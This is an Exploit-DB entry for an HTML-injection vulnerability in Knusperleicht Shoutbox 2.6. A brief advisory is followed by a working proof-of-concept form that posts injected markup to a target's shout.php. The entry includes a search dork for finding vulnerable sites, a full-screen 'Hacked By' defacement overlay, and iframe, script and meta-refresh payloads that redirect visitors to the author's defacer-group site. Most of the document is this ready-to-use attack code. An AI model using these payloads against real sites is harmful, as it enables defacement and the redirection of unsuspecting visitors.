Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection

EDB-ID:

29294


Author:

IMHOT3B

Type:

webapps


Platform:

PHP

Date:

2006-12-18


source: https://www.securityfocus.com/bid/21637/info

Knusperleicht Shoutbox is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.

Version 2.6 is vulnerable; other versions may also be affected.

<html> <head><title>Cyber-Sabotage.Org</title></head> <body> <p align="center"><b>IMHOT3B </b></p> <p align="center"><b>Knusperleicht Shoutbox 2.6 Html .njaction Bug</b></p> <p align="center"><b><font size="4">Cyber-Sabotage.Org</font></b><br> </p> <p align="center"> <a href=" http://www.google.com.tr/search?hl=tr&q=intitle:"Knusperleicht+Shoutbox+2.6"&meta ="> For Searching Click Here Please</a><br> </p> <form name="form1" method="post" action="http://targer/shout.php"> Nick Name | Takma Ad:<p> <input type="text" name="sbNick" size="127" value="</table><h1><font color=#ff0000> Cyber-Sabotage.Org | CSDT ( Cyber Sabotage and Defacer ) TEAM </font></h1>" maxlength="900"><br> <input type="hidden" name="AdminNick" value="si"><br> Message | Mesaj:<br> <input type="text" name="sbKommentar" size="127" value="</table><h1><font color=#ff0000> Cyber-Sabotage.Org | CSDT ( Cyber Sabotage and Defacer ) TEAM </font></h1>"><br> <input type="submit" name="sbAbschicken" value="Send | Gonder" class="form"><br> </p> </form> <p><b>Alternatif Html Kodlar.:</b></p> <p><b><h1>Cyber-Sabotage.Org</h1></b></p> <p><b><font color="#FFFFFF"><div style=left:0px;top:0px;width:1000px;height:8000px;background-color:#000000;position:absolute><h1>Hacked By IMHOT3B<br>Cyber-Sabotage.Org&lt ;br></div></font></b></p> <p><b><iframe src="http://www.cyber-sabotage.org" borders="0"></iframe></b></p> <p><b><script>location.href="http://www.cyber-sabotage.org&quot ;;</script></b></p> <p><b><meta http-equiv="Refresh" content="0;url= http://www.cyber-sabotage.org"></b></p> </body></html>